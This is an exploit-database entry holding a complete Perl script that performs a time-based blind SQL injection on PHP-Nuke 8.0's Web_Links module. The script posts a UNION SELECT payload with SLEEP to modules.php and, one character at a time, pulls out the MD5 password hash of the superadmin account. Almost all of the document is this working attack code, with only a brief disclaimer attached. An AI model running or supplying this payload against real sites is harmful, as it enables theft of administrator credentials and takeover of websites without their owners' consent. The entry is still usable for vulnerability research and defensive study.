PHP-Nuke <= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit

2010-07-10T00:00:00
ID 1337DAY-ID-13256
Type zdt
Reporter yawn
Modified 2010-07-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================================
PHP-Nuke <= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit 
=====================================================================


# PHP-Nuke <= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit
# Author: yawn
# Contact Me: http://www.unitx.net
# E-Mail: [email protected]
# Requirements: magic_quotes_gpc : off
# Greetings: #[email protected] | #[email protected] | Dante90
 
#   He had but little gold within his suitcase;
#   But all that he might borrow from a friend
#   On books and learning he would swiftly spend,
#                  -- Geoffrey Chaucer, The Clerk
 
 
use strict;
use warnings;
use LWP::UserAgent;
 
sub Nuke::Bench {
    my $hosto = $_;
        my $website = LWP::UserAgent->new;
        my $average = 0;
        print "[+] Calculating average load time (it may take a while) ...\n";
        for (my $i = 0; $i < 5 ; $i++) {
                my $bef = time();
                my $out = $website->get($hosto);
                my $time = time();
                $average += int($time-$bef);
        }
        return $average/5;
}
 
sub Nuke::Usage() {
        print "[+] Usage: perl nuke.pl <host>\n";
        print "[+]        the host must be the complete path to modules.php\n";
        print "[+] Example: perl nuke.pl http://www.site.com/modules.php\n";
}
 
sub Nuke::Banner() {
        print "[+] Remote Blind SQL Injection (Benchmark Mode) PHP-Nuke 8.0\n";
        print "[+] I'm not responsable for an illegal use of this exploit\n";
        print "[+] Date: 06-02-2010\n";
        print "[+] Author: yawn\n";
}
Nuke::Banner();
my $host = shift || die Nuke::Usage();
$host .= "?name=Web_Links&l_op=Add&title=WTF&description=WTF";
my $time = Nuke::Bench($host);
my $attack = LWP::UserAgent->new;
my $pass = "";
$attack->agent('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9)
Gecko/20100407 Ubuntu/9.04 (jaunty) Shiretoko/3.5.9');
my @charset  =  (48..57, 97..102);
print "[+] Average load time is $time\n";
print "[+] Trying to exploit the SQL Injection\n";
 
for (my $j = 1; $j <=32; $j++) {
    sleep(3);
    foreach (@charset) {
        sleep(2);
        print "[+] Now trying with $_ \n";
        my $before = time();
        my $resp = $attack->post($host,
        { url => "'/**/UNION SELECT
IF(SUBSTRING(pwd,$j,1)=CHAR($_),sleep(6),null) FROM nuke_authors WHERE
radminsuper='1" },
        Referer => $host);
        my $after = time();
        if(int($after-$before) > ($time + 4)) {
            print "[+] Success with ".chr($_)."\n";
            $pass .= chr($_);
            last;
        }
    }
}
print "[+] MD5 Hash : $pass\n";



#  0day.today [2018-03-14]  #